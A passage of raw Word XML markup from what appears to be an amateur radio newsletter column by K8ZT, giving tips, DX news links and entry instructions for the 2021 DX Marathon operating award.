        <w:t xml:space="preserve">Helpful hints to improve your 2021 score are available </w:t>
      </w:r>
      <w:hyperlink r:id="rId109">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:b/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2332A0D4" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6850AC45" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Improving Your Score</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="252994560" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="70C0E64F" wp14:editId="33504D86">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4219575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2684216" cy="3662363"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="114300" distB="114300" distL="114300" distR="114300"/>
            <wp:docPr id="13" name="image6.png" descr="Map&#10;&#10;Description automatically generated"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="13" name="image6.png" descr="Map&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId110"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2684216" cy="3662363"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EDC94D" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="325080F1" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">If you are serious about scoring highly, most competitors start at the beginning of the year. In fact, many serious operators devise plans to work specific countries by following </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B5593">
        <w:t>DXpedition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve"> news, working specific contests, etc. Noted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B5593">
        <w:t>DXing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve"> author Bob </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B5593">
        <w:t>Locher</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B5593">
        <w:t>, W9KNI (</w:t>
      </w:r>
      <w:hyperlink r:id="rId111">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:b/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t xml:space="preserve">"The Complete </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:b/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>DX'er</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:b/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">) wrote a book about his experience, </w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:rFonts w:eastAsia="Georgia"/>
          <w:b/>
          <w:i/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId112">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:b/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>A Year of DX</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">.” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556F5BAA" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96"/>
    <w:p w14:paraId="2C1C78DA" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">A few resources that can be handy for planning your Marathon activities can be found on my website’s DX &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B5593">
        <w:t>DXing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve"> News page- </w:t>
      </w:r>
      <w:hyperlink r:id="rId113">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.k8zt.com/news/dx-dx-news</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve"> including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5512D8" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">NG3K Announced DX Operations (ADXO)- </w:t>
      </w:r>
      <w:hyperlink r:id="rId114">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.ng3k.com/Misc/adxo.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69C0C587" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">DX World.net- </w:t>
      </w:r>
      <w:hyperlink r:id="rId115">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.dx-world.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2366BCD0" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">DX 425 News- </w:t>
      </w:r>
      <w:hyperlink r:id="rId116">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.425dxn.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="37663933" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:t>QRZ Now.com DX News-</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId117">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>http://qrznow.com/category/dxing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67AD37DC" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:t>A wide variety of DX Clusters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B44E70F" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:t>The fine articles “DX This Week” by Bill AJ8B here in the Ohio Section Journal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D61191F" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:t>Weekly ARRL DX Bulletin - Sign Into ARRL Website, Edit your Profile and Edit your email Subscriptions.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="252995584" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="2ABAEC04" wp14:editId="5FFD233A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1465536</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>533400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3706539" cy="3776663"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="10" name="image9.png" descr="Graphical user interface&#10;&#10;Description automatically generated"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="10" name="image9.png" descr="Graphical user interface&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId118"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3706539" cy="3776663"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="310D78AE" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="252996608" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="0D3D56BE" wp14:editId="50DBBAF6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2957195</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4052570" cy="2914650"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="5" name="image7.png" descr="Graphical user interface,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5" name="image7.png" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId119"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4052570" cy="2914650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDB6A73" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submitting an Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388FA34E" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96"/>
    <w:p w14:paraId="7978C5F8" w14:textId="5BBD1E8A" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">If you keep your Amateur Radio Log in an electronic logbook entering the DX Marathon can be very easy using AD1C's free </w:t>
      </w:r>
      <w:hyperlink r:id="rId120">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>ADIF to DX Marathon software</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">. The software will take almost any ADIF export file of your 2021 QSOs and convert it to the Excel spreadsheet format used in the Marathon. If you are still paper logging all of your contacts, </w:t>
      </w:r>
      <w:hyperlink r:id="rId121">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:rFonts w:eastAsia="Georgia"/>
            <w:i/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>you can download the Excel spreadsheet entry form</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve"> and fill in the entries manually. Entries are due  2359Z, January 5, 2022, so you still have plenty of time to enter the 2021 running of the Marathon. Start planning your 2022 effort soon to take full</w:t>
      </w:r>
      <w:r w:rsidR="00A93726">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">advantage of all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B5593">
        <w:t>DXpeditions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B5593">
        <w:t>, Contests, etc. It is like starting your DXCC chase anew each year, so you can consider it one of your New Year’s Resolutions!</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5593">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="252997632" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="6EE44F6B" wp14:editId="47C7A585">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1500188</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2924175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5624513" cy="5757456"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="114300" distB="114300" distL="114300" distR="114300"/>
            <wp:docPr id="70" name="image11.png" descr="Table&#10;&#10;Description automatically generated"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="70" name="image11.png" descr="Table&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId122"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5624513" cy="5757456"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="294FA4BF" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96"/>
    <w:p w14:paraId="6F6FEB5B" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:t xml:space="preserve">That’s it for this month, 73 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A4F633" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRPr="002B5593" w:rsidRDefault="00A46D96" w:rsidP="00A46D96">
      <w:r w:rsidRPr="002B5593">
        <w:t>Anthony, K8ZT (</w:t>
      </w:r>
      <w:hyperlink r:id="rId123">
        <w:r w:rsidRPr="002B5593">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>k8zt@arrl.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B5593">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F24D7AC" w14:textId="67635A71" w:rsidR="00AD6A1E" w:rsidRDefault="00AD6A1E" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699192DD" w14:textId="10BC251E" w:rsidR="005E6BBA" w:rsidRDefault="005E6BBA" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A696D6D" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D83D13" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55B569BB" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD81D2C" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24718382" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65411386" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16B46580" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11AE6C79" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F38619" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE434AF" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458E99B6" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792FE254" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AAF3CAE" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F7BA3B" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E481B8" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1275AE5E" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EAB7925" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D542982" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
